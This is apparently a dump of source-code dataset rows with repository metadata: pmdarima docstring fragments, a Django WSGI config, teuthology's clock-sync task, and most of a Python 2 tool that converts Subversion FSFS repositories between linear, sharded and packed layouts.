Note that the default behavior is to warn, and fits that fail will be
returned as None. This is the recommended behavior, as statsmodels
ARIMA and SARIMAX models hit bugs periodically that can cause
an otherwise healthy parameter combination to fail for reasons not
related to pmdarima.
trace : bool, optional (default=False)
Whether to print status on the fits. Note that this can be
very verbose...
random : bool, optional (default=False)
Similar to grid searches, ``auto_arima`` provides the capability to
perform a "random search" over a hyper-parameter space. If ``random``
is True, rather than perform an exhaustive search or ``stepwise``
search, only ``n_fits`` ARIMA models will be fit (``stepwise`` must be
False for this option to do anything).
random_state : int, long or numpy ``RandomState``, optional (default=None)
The PRNG for when ``random=True``. Ensures replicable testing and
results.
n_fits : int, optional (default=10)
If ``random`` is True and a "random search" is going to be performed,
        ``n_fits`` is the number of ARIMA models to be fit.
{return_valid_fits}
out_of_sample_size : int, optional (default=0)
The ``ARIMA`` class can fit only a portion of the data if specified,
in order to retain an "out of bag" sample score. This is the
number of examples from the tail of the time series to hold out
and use as validation examples. The model will not be fit on these
samples, but the observations will be added into the model's ``endog``
and ``exog`` arrays so that future forecast values originate from the
end of the endogenous vector.
For instance::
y = [0, 1, 2, 3, 4, 5, 6]
out_of_sample_size = 2
> Fit on: [0, 1, 2, 3, 4]
> Score on: [5, 6]
> Append [5, 6] to end of self.arima_res_.data.endog values
scoring : str, optional (default='mse')
If performing validation (i.e., if ``out_of_sample_size`` > 0), the
metric to use for scoring the out-of-sample data. One of ('mse', 'mae')
scoring_args : dict, optional (default=None)
A dictionary of key-word arguments to be passed to the ``scoring``
metric.
with_intercept : bool, optional (default=True)
Whether to include an intercept term. Default is True.
sarimax_kwargs : dict or None, optional (default=None)
Keyword arguments to pass to the SARIMAX constructor, if seasonal.
{fit_args}
See Also
--------
:func:`pmdarima.arima.ARIMA`
Notes
-----
* Fitting with `stepwise=False` can prove slower, especially when
`seasonal=True`.
References
----------
.. [1] https://wikipedia.org/wiki/Autoregressive_integrated_moving_average
.. [2] R's auto-arima source code: http://bit.ly/2gOh5z2
.. [3] R's auto-arima documentation: http://bit.ly/2wbBvUN
"""
_Y_DOCSTR = """
y : array-like or iterable, shape=(n_samples,)
The time-series to which to fit the ``ARIMA`` estimator. This may
either be a Pandas ``Series`` object (statsmodels can internally
use the dates in the index), or a numpy array. This should be a
one-dimensional array of floats, and should not contain any
``np.nan`` or ``np.inf`` values.
"""
_EXOG_DOCSTR = """
exogenous : array-like, shape=[n_obs, n_vars], optional (default=None)
An optional 2-d array of exogenous variables. If provided, these
variables are used as additional features in the regression
operation. This should not include a constant or trend. Note that
if an ``ARIMA`` is fit on exogenous features, it must be provided
exogenous features for making predictions.
"""
_FIT_ARGS_DOCSTR = """
**fit_args : dict, optional (default=None)
A dictionary of keyword arguments to pass to the :func:`ARIMA.fit`
method.
"""
_VALID_FITS_DOCSTR = """
return_valid_fits : bool, optional (default=False)
If True, will return all valid ARIMA fits in a list. If False (by
default), will only return the best fit.
"""
| true | true |
f7232b9b6e151dc03922e891f067fde890f8592d | 397 | py | Python | djangochat/wsgi.py | muondu/Django-chat-app | 9474733779402cdb2c4764a9d77b8c0e4f0842fe | [
"MIT"
] | null | null | null | djangochat/wsgi.py | muondu/Django-chat-app | 9474733779402cdb2c4764a9d77b8c0e4f0842fe | [
"MIT"
] | null | null | null | djangochat/wsgi.py | muondu/Django-chat-app | 9474733779402cdb2c4764a9d77b8c0e4f0842fe | [
"MIT"
] | null | null | null | """
WSGI config for djangochat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project's settings module; a DJANGO_SETTINGS_MODULE
# value already present in the environment takes precedence over this default.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangochat.settings')
# Module-level WSGI callable that WSGI servers (gunicorn, mod_wsgi, ...) load.
application = get_wsgi_application()
| 23.352941 | 78 | 0.788413 |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangochat.settings')
application = get_wsgi_application()
| true | true |
f7232ca5356a3bbb385a26982a7f9d1e936bb891 | 2,888 | py | Python | teuthology/task/clock.py | grapheo12/teuthology | f69547410d113fea9811e5a002cc7a4689cffdbb | [
"MIT"
] | null | null | null | teuthology/task/clock.py | grapheo12/teuthology | f69547410d113fea9811e5a002cc7a4689cffdbb | [
"MIT"
] | null | null | null | teuthology/task/clock.py | grapheo12/teuthology | f69547410d113fea9811e5a002cc7a4689cffdbb | [
"MIT"
] | null | null | null | """
Clock synchronizer
"""
import logging
import contextlib
from teuthology.orchestra import run
log = logging.getLogger(__name__)
@contextlib.contextmanager
def task(ctx, config):
    """
    Sync clocks on all cluster remotes for the duration of the task.

    On entry, each remote's time daemon is stopped, the clock is stepped
    into sync (``ntpd -gq`` or ``chronyc makestep``), the daemon is
    restarted, and the current peer/source status is printed so the
    initial skew shows up in the logs.  On exit, the peer/source status
    is printed again for the final skew.

    Skewing by some number of seconds is not implemented yet.

    example::

        tasks:
        - clock:
        - ceph:
        - interactive:

    to sync.

    :param ctx: Context
    :param config: Configuration (currently unused by this task)
    """
    log.info('Syncing clocks and checking initial clock skew...')
    for rem in ctx.cluster.remotes.keys():
        rem.run(
            # Alternatives chained with '||' / ';' because different
            # distros ship different time daemons (ntp, ntpd, chronyd);
            # the trailing 'true' keeps the command from failing outright
            # when none of the status tools are present.
            args = [
                'sudo', 'systemctl', 'stop', 'ntp.service', run.Raw('||'),
                'sudo', 'systemctl', 'stop', 'ntpd.service', run.Raw('||'),
                'sudo', 'systemctl', 'stop', 'chronyd.service',
                run.Raw(';'),
                'sudo', 'ntpd', '-gq', run.Raw('||'),
                'sudo', 'chronyc', 'makestep',
                run.Raw(';'),
                'sudo', 'systemctl', 'start', 'ntp.service', run.Raw('||'),
                'sudo', 'systemctl', 'start', 'ntpd.service', run.Raw('||'),
                'sudo', 'systemctl', 'start', 'chronyd.service',
                run.Raw(';'),
                'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
                'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
                run.Raw('||'),
                'true'
            ],
            timeout = 60,
        )
    try:
        yield
    finally:
        log.info('Checking final clock skew...')
        for rem in ctx.cluster.remotes.keys():
            rem.run(
                args=[
                    'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
                    'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
                    run.Raw('||'),
                    'true'
                ],
            )
@contextlib.contextmanager
def check(ctx, config):
    """
    Report clock skew at the start and the end of the task.

    Runs ``ntpq -p`` (falling back to ``chronyc sources``) on every
    remote so the offsets appear in the logs; unlike :func:`task`, the
    clocks are never adjusted here.

    :param ctx: Context
    :param config: Configuration (currently unused by this task)
    """
    log.info('Checking initial clock skew...')
    for rem in ctx.cluster.remotes.keys():
        rem.run(
            # '|| true' keeps a missing ntpq/chronyc binary from failing
            # the task; the output is informational only.
            args=[
                'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
                'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
                run.Raw('||'),
                'true'
            ],
        )
    try:
        yield
    finally:
        log.info('Checking final clock skew...')
        for rem in ctx.cluster.remotes.keys():
            rem.run(
                args=[
                    'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
                    'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
                    run.Raw('||'),
                    'true'
                ],
            )
| 27.769231 | 76 | 0.447715 | import logging
import contextlib
from teuthology.orchestra import run
log = logging.getLogger(__name__)
@contextlib.contextmanager
def task(ctx, config):
log.info('Syncing clocks and checking initial clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args = [
'sudo', 'systemctl', 'stop', 'ntp.service', run.Raw('||'),
'sudo', 'systemctl', 'stop', 'ntpd.service', run.Raw('||'),
'sudo', 'systemctl', 'stop', 'chronyd.service',
run.Raw(';'),
'sudo', 'ntpd', '-gq', run.Raw('||'),
'sudo', 'chronyc', 'makestep',
run.Raw(';'),
'sudo', 'systemctl', 'start', 'ntp.service', run.Raw('||'),
'sudo', 'systemctl', 'start', 'ntpd.service', run.Raw('||'),
'sudo', 'systemctl', 'start', 'chronyd.service',
run.Raw(';'),
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
timeout = 60,
)
try:
yield
finally:
log.info('Checking final clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
@contextlib.contextmanager
def check(ctx, config):
log.info('Checking initial clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
try:
yield
finally:
log.info('Checking final clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
| true | true |
f7232e73f3ca4fd8e067d2767715a445a773b3bd | 27,080 | py | Python | fsfs-reshard.py | ymartin59/svn-fsfs-reshard | 8d045a984bf4eacaaedb8f996bed7eee19f94599 | [
"Apache-2.0"
] | 2 | 2016-01-29T20:51:29.000Z | 2018-03-29T11:57:33.000Z | fsfs-reshard.py | ymartin59/svn-fsfs-reshard | 8d045a984bf4eacaaedb8f996bed7eee19f94599 | [
"Apache-2.0"
] | 3 | 2015-11-28T08:31:07.000Z | 2016-02-07T21:03:08.000Z | fsfs-reshard.py | ymartin59/svn-fsfs-reshard | 8d045a984bf4eacaaedb8f996bed7eee19f94599 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# fsfs-reshard.py REPOS_PATH
# fsfs-reshard.py REPOS_PATH -target=MAX_FILES_PER_SHARD
#
# Display repository information about fsfs db.
#
# fsfs-reshard.py REPOS_PATH MAX_FILES_PER_SHARD
#
# Perform an offline conversion of an FSFS repository between linear (format
# 2, usable by Subversion 1.4+) and sharded (format 3,4,6,7), usable by Subversion
# 1.5+) layouts.
#
# The MAX_FILES_PER_SHARD argument specifies the maximum number of files
# that will be stored in each shard (directory), or zero to specify a linear
# layout. Subversion 1.5 uses a default value of 1000 files per shard.
#
# As the repository will not be valid while the conversion is in progress,
# the repository administrator must ensure that access to the repository is
# blocked for the duration of the conversion.
#
# In the event that the conversion is interrupted, the repository will be in
# an inconsistent state. The repository administrator should then re-run
# this tool to completion.
#
#
# Note that, currently, resharding from one sharded layout to another is
# likely to be an extremely slow process. To reshard, we convert from a
# sharded to linear layout and then to the new sharded layout. The problem
# is that the initial conversion to the linear layout triggers exactly the
# same 'large number of files in a directory' problem that sharding is
# intended to solve.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# ====================================================================
#
# Subversion filesystem format 4, 6 and 7 support for versions 1.6, 1.7, 1.8 and 1.9,
# unpack operation and shard file computation contributed by Yves Martin
# (ymartin1040 0x40 gmail 0x2E com)
#
# $HeadURL: http://svn.apache.org/repos/asf/subversion/trunk/tools/server-side/fsfs-reshard.py $
# $LastChangedDate: 2009-11-16 20:07:17 +0100 (Mon, 16 Nov 2009) $
# $LastChangedBy: hwright $
# $LastChangedRevision: 880911 $
import os, stat, sys, shutil
from errno import EEXIST
from sets import Set
import ConfigParser
def usage():
  """Print a usage message describing both invocation modes, then exit
  with status 1."""
  # The template contains two %s placeholders (one per usage form), both
  # standing for the program name, so the same value must be supplied
  # twice.  Supplying a single bare string here used to raise
  # "TypeError: not enough arguments for format string" instead of
  # printing the help text.
  print("""usage: %s REPOS_PATH [target=MAX_FILES_PER_SHARD]
Computes shard sizes for current repository or for a target
MAX_FILES_PER_SHARD to tune this parameter according to
performance criteria.
usage: %s REPOS_PATH MAX_FILES_PER_SHARD [START END]
Perform an offline conversion of an FSFS repository between linear
(readable by Subversion 1.4 or later) and sharded (readable by
Subversion 1.5 or later) layouts.
It is recommended to first upgrade your repository to your current
Subversion release with 'svnadmin upgrade REPOS_PATH'.
Packed shards are unpacked before converting. According to your
needs, you may want to invoke 'svnadmin pack REPOS_PATH' after.
The MAX_FILES_PER_SHARD argument specifies the maximum number of
files that will be stored in each shard (directory), or zero to
specify a linear layout. Subversion 1.5 uses a default value of
1000 files per shard.
Convert revisions START through END inclusive if specified, or all
revisions if unspecified.
""" % (sys.argv[0], sys.argv[0]))
  sys.exit(1)
def incompatible_repos_format(repos_path, format):
  """Report that the repository at REPOS_PATH uses a repository format
  FORMAT other than '3' or '5', which this tool cannot handle, and
  terminate the program with status 1."""
  message = """error: unable to convert repository '%s'.
This repository is not compatible with this tool. Valid
repository formats are '3' or '5'; this repository is
format '%s'.
""" % (repos_path, format)
  sys.stderr.write(message)
  sys.stderr.flush()
  sys.exit(1)
def incompatible_fs_format(repos_path, format):
  """Report that the filesystem inside REPOS_PATH has format FORMAT,
  which this tool cannot work with, and terminate with status 1."""
  message = """error: unable to open repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. Valid filesystem formats are '1', '2', '3', '4' or '6'; this
repository contains a filesystem with format '%s'.
Compressed packed revprops is not supported.
Packed shards with logical addressing cannot be analyzed or unpacked.
""" % (repos_path, format)
  sys.stderr.write(message)
  sys.stderr.flush()
  sys.exit(1)
def unexpected_fs_format_options(repos_path):
  """Report that the filesystem format file of REPOS_PATH carries data
  after the format number where none is allowed, then exit with
  status 1."""
  message = """error: unable to open repository '%s'.
This repository contains a filesystem that appears to be invalid -
there is unexpected data after the filesystem format number.
""" % repos_path
  sys.stderr.write(message)
  sys.stderr.flush()
  sys.exit(1)
def incompatible_fs_format_option(repos_path, option):
  """Report that the filesystem in REPOS_PATH declares a format option
  OPTION this tool does not recognise (only 'layout' and 'addressing'
  are understood), then exit with status 1."""
  message = """error: unable to convert repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. This tool recognises the 'layout' and 'addressing'
options but the filesystem uses the '%s' option.
""" % (repos_path, option)
  sys.stderr.write(message)
  sys.stderr.flush()
  sys.exit(1)
def warn_about_fs_format_1(repos_path, format_path):
  """Warn that REPOS_PATH holds a format 1 FSFS filesystem whose
  conversion would be one-way (this tool cannot reconstruct format 1),
  point the user at FORMAT_PATH, and exit with status 1."""
  message = """warning: conversion of '%s' will be one-way.
This repository is currently readable by Subversion 1.1 or later.
This tool can convert this repository to one that is readable by
either Subversion 1.4 (or later) or Subversion 1.5 (or later),
but it is not able to convert it back to the original format - a
separate dump/load step would be required.
If you would like to upgrade this repository anyway, delete the
file '%s' and re-run this tool.
""" % (repos_path, format_path)
  sys.stderr.write(message)
  sys.stderr.flush()
  sys.exit(1)
def check_repos_format(repos_path):
  """Check that REPOS_PATH contains a repository with a suitable format
  ('3' or '5'); print a message and exit if not.

  A missing or unreadable format file is reported as '<unreadable>'.
  Returns None on success.
  """
  format_path = os.path.join(repos_path, 'format')
  try:
    format_file = open(format_path)
    try:
      format = format_file.readline()
    finally:
      # Always release the handle; the previous version leaked it.
      format_file.close()
    if not format.endswith('\n'):
      incompatible_repos_format(repos_path, format + ' <missing newline>')
    format = format.rstrip('\n')
    if format not in ('3', '5'):
      incompatible_repos_format(repos_path, format)
  except IOError:
    # In all likelihood, the file doesn't exist.
    incompatible_repos_format(repos_path, '<unreadable>')
def is_packed_revprops_compressed(repos_path):
  """Check if repository at REPOS_PATH has compressed revprops enabled.

  Reads db/fsfs.conf and returns the boolean value of the
  [packed-revprops] compress-packed-revprops option; returns False when
  the section or option is absent (e.g. commented out).

  NOTE(review): ConfigParser.read() silently ignores unreadable files,
  so a missing fsfs.conf is expected to surface as NoSectionError
  (-> False) rather than the IOError branch below -- confirm.
  """
  fsfsconf_path = os.path.join(repos_path, 'db', 'fsfs.conf')
  try:
    config = ConfigParser.ConfigParser()
    config.read(fsfsconf_path)
    return config.getboolean('packed-revprops', 'compress-packed-revprops')
  except IOError:
    # In all likelihood, the file doesn't exist.
    incompatible_repos_format(repos_path, '<unreadable>')
  except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
    return False # Likely section is lacking or option is commented out
def check_packed_shards_logical(fs_format, min_unpacked_rev):
  """Abort with status 1 when a filesystem using logical addressing
  (fs_format[2] == 'logical') has packed shards (min_unpacked_rev > 0),
  since such shards cannot be analyzed or unpacked; otherwise return
  False."""
  addressing = fs_format[2]
  if addressing != "logical" or min_unpacked_rev <= 0:
    return False
  sys.stdout.write("\n")
  sys.stdout.flush()
  sys.stderr.write("Packed shards with logical addressing cannot be analyzed or unpacked.\n")
  sys.stderr.flush()
  sys.exit(1)
def check_fs_format(repos_path):
  """Check that REPOS_PATH contains a filesystem with a suitable format,
  or that it contains no format file; print a message and exit if
  neither is true.

  Return a list [format number (str, '0' if unreadable), shard size
  (int, 0 for linear), addressing mode (str or None)].
  """
  result = [0, 0, None]
  db_path = os.path.join(repos_path, 'db')
  format_path = os.path.join(db_path, 'format')
  if not os.path.exists(format_path):
    # Recover from format.bak if a previous run was interrupted.
    format_path = os.path.join(db_path, 'format.bak')
    if not os.path.exists(format_path):
      sys.stderr.write("error: db/format and db/format.bak missing.\n")
      sys.stderr.flush()
      sys.exit(1)
  try:
    format_file = open(format_path)
    try:
      format = format_file.readline()
      if not format.endswith('\n'):
        incompatible_fs_format(repos_path, format + ' <missing newline>')
      format = format.rstrip('\n')
      if format == '1':
        # This is a format 1 (svndiff0 only) filesystem.  We can upgrade
        # it, but we can't downgrade again (since we can't uncompress any
        # of the svndiff1 deltas that may have been written).  Warn the
        # user and exit.
        warn_about_fs_format_1(repos_path, format_path)
      if format not in ('2', '3', '4', '6', '7'):
        incompatible_fs_format(repos_path, format)
      result[0] = format
      for line in format_file:
        if format == '2':
          # Format 2 allows no options after the format number.
          unexpected_fs_format_options(repos_path)
        line = line.rstrip('\n')
        if line == 'layout linear':
          pass
        elif line.startswith('layout sharded '):
          result[1] = int(line[15:])
        elif line.startswith('addressing '):
          result[2] = line[11:]
        else:
          incompatible_fs_format_option(repos_path, line)
    finally:
      # Close the handle on every path, including the sys.exit() calls
      # above; the previous version leaked it on all error paths.
      format_file.close()
  except IOError:
    # The format file might not exist if we've previously been
    # interrupted, or if the user is following our advice about
    # upgrading a format 1 repository.  In both cases, we'll just
    # assume the format was compatible.
    pass
  return result
def current_file(repos_path):
  """Return the whitespace-separated fields of the first line of
  REPOS_PATH/db/current (historically the triple (revision,
  next_node_id, next_copy_id); newer formats may carry fewer fields)."""
  current_path = os.path.join(repos_path, 'db', 'current')
  # Close the handle explicitly instead of leaking it until GC.
  f = open(current_path)
  try:
    return f.readline().split()
  finally:
    f.close()
def backup_fs_format(repos_path):
  """Rename db/format to db/format.bak for repository REPOS_PATH.

  Quietly do nothing when db/format is absent (e.g. it was already
  renamed by an interrupted earlier run)."""
  db_dir = os.path.join(repos_path, 'db')
  src = os.path.join(db_dir, 'format')
  dst = os.path.join(db_dir, 'format.bak')
  try:
    mode = os.stat(src).st_mode
  except OSError:
    # The file probably doesn't exist (already moved aside).
    return
  # On Windows, the file must be writable before it can be
  # renamed/removed, so force the user-write bit.
  os.chmod(src, mode | stat.S_IWUSR)
  try:
    os.rename(src, dst)
  except OSError:
    # Unexpected, but try to go on: a stale backup is probably in the
    # way, so drop it and retry.
    os.remove(dst)
    os.rename(src, dst)
def write_fs_format(repos_path, fs_format):
  """Restore db/format from db/format.bak and rewrite it for repository
  REPOS_PATH according to FS_FORMAT, a list of [format number (str),
  shard size (int, 0 for linear), addressing mode (str or None)]."""
  format_path = os.path.join(repos_path, 'db', 'format')
  format_bak_path = os.path.join(repos_path, 'db', 'format.bak')
  # Permissions and owner/group are preserved with rename.
  try:
    os.rename(format_bak_path, format_path)
  except OSError:
    # Unexpected but try to go on: clear the target; the fresh contents
    # are written below anyway.
    os.remove(format_path)
  lines = ['%s\n' % fs_format[0]]
  # fs_format[0] is a *string*: compare numerically.  The previous
  # 'fs_format[0] > 2' compared str > int, which in Python 2 is always
  # true, so a format-2 file wrongly received a 'layout ...' line.
  if int(fs_format[0]) > 2:
    if fs_format[1] > 0:
      lines.append('layout sharded %d\n' % fs_format[1])
    else:
      lines.append('layout linear\n')
    if int(fs_format[0]) > 6 and fs_format[2] is not None:
      lines.append('addressing %s\n' % fs_format[2])
  f = open(format_path, 'wb')
  try:
    # Encode so the binary-mode write behaves the same on Python 2 and 3.
    f.write(''.join(lines).encode('ascii'))
  finally:
    f.close()
def suffix_unpacked_shard(path):
  """Append a '.shard' suffix to every bare shard directory directly
  under PATH, leaving entries already named '*.shard' or '*.pack' (and
  plain files) untouched."""
  for entry in os.listdir(path):
    already_marked = entry.endswith('.shard') or entry.endswith('.pack')
    if already_marked:
      continue
    entry_path = os.path.join(path, entry)
    if os.path.isdir(entry_path):
      os.rename(entry_path, entry_path + '.shard')
def linearise(path):
  """Move all the files in subdirectories of PATH into PATH, and remove
  the subdirectories.

  Handle conflicts between subdirectory names and files contained in
  subdirectories by ensuring subdirectories have a '.shard' suffix prior
  to moving (the files are assumed not to have this suffix).  Abort if a
  subdirectory is found to contain another subdirectory.
  """
  suffix_unpacked_shard(path)
  # Now move all the subdirectory contents into the parent and remove
  # the subdirectories.
  for root_path, dirnames, filenames in os.walk(path):
    if root_path == path:
      # The first os.walk entry is PATH itself; only its subdirectories
      # (the shards) need flattening.
      continue
    if len(dirnames) > 0:
      # A shard must contain only plain revision files; a nested
      # directory means the layout is not what this tool expects.
      sys.stderr.write("error: directory '%s' contains other unexpected directories.\n" \
            % root_path)
      sys.stderr.flush()
      sys.exit(1)
    for name in filenames:
      from_path = os.path.join(root_path, name)
      to_path = os.path.join(path, name)
      os.rename(from_path, to_path)
    # The shard directory is empty now (top-down walk already yielded
    # its contents above), so it can be removed.
    os.rmdir(root_path)
def shard(path, max_files_per_shard, start, end):
    """Move the files for revisions START to END inclusive in PATH into
    subdirectories of PATH named such that subdirectory '0' contains at most
    MAX_FILES_PER_SHARD files, those named [0, MAX_FILES_PER_SHARD).  Abort if
    PATH is found to contain any entries with non-numeric names."""
    tmp = path + '.reshard'
    try:
        os.mkdir(tmp)
    except OSError as e:  # 'as' is valid on Python 2.6+ and 3.x; ', e' is 2-only
        if e.errno != EEXIST:
            raise
    # Move all entries into staging shards named N.shard.
    for rev in range(start, end + 1):
        name = str(rev)
        # Renamed from 'shard', which shadowed this function itself.
        shard_index = rev // max_files_per_shard
        shard_name = str(shard_index) + '.shard'
        from_path = os.path.join(path, name)
        to_path = os.path.join(tmp, shard_name, name)
        try:
            os.rename(from_path, to_path)
        except OSError:
            # The most likely explanation is that the shard directory doesn't
            # exist.  Create it and retry the rename (a genuinely missing
            # revision file will make the retry raise).
            os.mkdir(os.path.join(tmp, shard_name))
            os.rename(from_path, to_path)
    # Now rename all the shards to remove the suffix.
    skipped = 0
    for name in os.listdir(tmp):
        if not name.endswith('.shard'):
            sys.stderr.write("warning: ignoring unexpected subdirectory '%s'.\n" \
                             % os.path.join(tmp, name))
            sys.stderr.flush()
            skipped += 1
            continue
        from_path = os.path.join(tmp, name)
        to_path = os.path.join(path, os.path.basename(from_path)[:-6])
        os.rename(from_path, to_path)
    # Only remove the staging directory when nothing unexpected was left in it.
    if skipped == 0:
        os.rmdir(tmp)
def extract_part(source, start_position, end_position, target_file):
    """Copy bytes [START_POSITION, END_POSITION) of the open file SOURCE
    into a newly created TARGET_FILE (parent directories are created as
    needed).  Return the position reached in SOURCE after copying."""
    copy_buffer_size = 4096
    target_dir = os.path.dirname(target_file)
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    target = open(target_file, 'wb')
    try:
        last_position = start_position
        source.seek(last_position)
        while last_position < end_position:
            bytes_tocopy = min(copy_buffer_size, end_position - last_position)
            rev_buffer = source.read(bytes_tocopy)
            if not rev_buffer:
                # Premature EOF (truncated source).  The original looped
                # forever here: an empty read never advanced last_position.
                break
            target.write(rev_buffer)
            last_position += len(rev_buffer)
    finally:
        target.close()
    return last_position
def unpack_shard(packed_path, shard_number, unpack, first_rev, revs_size):
    """Compute the size of every revision stored in the packed shard at
    PACKED_PATH and record it in the REVS_SIZE dict, keyed by revision
    number starting at FIRST_REV.  When UNPACK is true, also extract each
    revision out of the shard's 'pack' file into ../<shard_number>/<rev>.

    Returns REVS_SIZE (the same dict, updated in place).
    """
    # The manifest lists, one per line and in revision order, the byte
    # offset of each revision inside the 'pack' file; a revision's size is
    # the distance to the next offset (or to the end of 'pack').
    manifest = open(os.path.join(packed_path, 'manifest'), 'r')
    pack_path = os.path.join(packed_path, 'pack')
    end_pack = os.path.getsize(pack_path)
    if unpack:
        pack = open(pack_path, 'rb')
    last_position = int(manifest.readline())
    rev_index = first_rev
    while last_position < end_pack:
        # Read next revision start byte in pack file
        try:
            byte_position = int(manifest.readline())
        except ValueError:
            # last revision: end of pack file (readline() returned '')
            byte_position = end_pack
        revs_size[rev_index] = byte_position - last_position
        if unpack:
            # Extract revision from pack file to corresponding shard
            # directory, i.e. <parent-of-packed_path>/<shard_number>/<rev>.
            arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev_index))
            last_position = extract_part(pack, last_position, byte_position, arev)
        else:
            last_position = byte_position
        rev_index += 1
    # Close file descriptors
    manifest.close()
    if unpack:
        pack.close()
    return revs_size
def unpack_revprops_shard(packed_path, shard_number, first_rev):
    """Unpack a single packed revision-properties shard at PACKED_PATH back
    into linear files ../<shard_number>/<rev>, starting at revision
    FIRST_REV.

    The shard's 'manifest' names, one line per revision, which pack file
    inside the shard holds that revision's properties; each pack file then
    carries a header (first revision, revision count, per-revision sizes)
    followed by the concatenated property data.
    """
    # revprops_packfile: revision number -> name of the pack file that
    # (according to the manifest) holds that revision's properties.
    revprops_packfile = {}
    packfiles = Set()  # sets.Set: this script targets Python 2
    with open(os.path.join(packed_path, 'manifest'), 'rb') as manifest:
        for revfile in manifest:
            revfile = revfile.rstrip('\n')
            revprops_packfile[first_rev] = revfile
            packfiles.add(revfile)
            first_rev += 1
    for apackfile in packfiles:
        packrevprops = open(os.path.join(packed_path, apackfile), 'rb')
        packrevprops.read(2) # Skip uncompressed content size
        # NOTE(review): read(2) assumes that size header is exactly two
        # bytes wide — confirm against the FSFS packed-revprops format.
        # Parse revprops sizes
        rev = int(packrevprops.readline())
        rev_count = int(packrevprops.readline())
        end_rev = rev + rev_count - 1
        revprop_sizes = {}
        for r in range(rev, rev + rev_count):
            revprop_sizes[r] = int(packrevprops.readline())
        # Skip the separator line between the size list and the data.
        packrevprops.readline()
        last_position = packrevprops.tell()
        while rev <= end_rev:
            end_position = last_position + revprop_sizes[rev]
            if apackfile == revprops_packfile[rev]:
                # Extract revprop declared in manifest
                arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev))
                last_position = extract_part(packrevprops, last_position, end_position, arev)
            else:
                # Revision lives in a different pack file: just skip over it.
                last_position = end_position
            rev += 1
        # Close file descriptors
        packrevprops.close()
def unpack_revprops_shards(revprops_path, current_shard):
    """Unpack revision properties shards"""
    for parent, subdirs, _files in os.walk(revprops_path):
        packed = [d for d in subdirs if d.endswith('.pack')]
        for dirname in packed:
            number = int(dirname[:-5])
            packed_path = os.path.join(parent, dirname)
            first_rev = current_shard * number if number > 0 else 1
            unpack_revprops_shard(packed_path, number, first_rev)
            # Drop the x.pack structure once its contents are unpacked.
            shutil.rmtree(packed_path)
def compute_rev_sizes(revs_path, current_shard, unpack):
    """Compute revision sizes based on current shard capacity Support either
    linear, sharded or packed revisions. If unpack is True, packed sharded are
    unpacked too.
    """
    revs_size = {}
    for parent, subdirs, files in os.walk(revs_path):
        # Plain (linear or already-sharded) revision files: size directly.
        for filename in files:
            try:
                revnum = int(filename)
            except ValueError:
                continue  # not a revision file (e.g. 'manifest' or 'pack')
            revs_size[revnum] = os.path.getsize(os.path.join(parent, filename))
        # Packed shards: sizes come from the shard's manifest.
        for dirname in subdirs:
            if not dirname.endswith('.pack'):
                continue
            shard_number = int(dirname[:-5])
            shard_path = os.path.join(parent, dirname)
            revs_size = unpack_shard(shard_path, shard_number, unpack,
                                     current_shard * shard_number, revs_size)
            if unpack:
                # remove x.pack structure
                shutil.rmtree(shard_path)
    return revs_size
def compute_shard_sizes(revs_size, max_files_per_shard):
    """Print the on-disk size of each shard that a layout with
    MAX_FILES_PER_SHARD files per shard would produce, given REVS_SIZE, a
    dict mapping revision number -> revision file size, followed by the
    minimum/maximum/average size of the full shards."""
    current_shard = 0
    current_shard_size = 0
    min_shard_size = 2**63
    max_shard_size = 0
    shard_size_sum = 0
    # Iterate in revision order: Python 2 dict iteration order is
    # arbitrary, and the running per-shard total is only meaningful when
    # consecutive revisions are accumulated together (the original used
    # iteritems() and could mix revisions from different shards).
    for i, size in sorted(revs_size.items()):
        current_shard_size += size
        if ((i + 1) % max_files_per_shard) == 0:
            # Shard boundary reached: report and reset the running total.
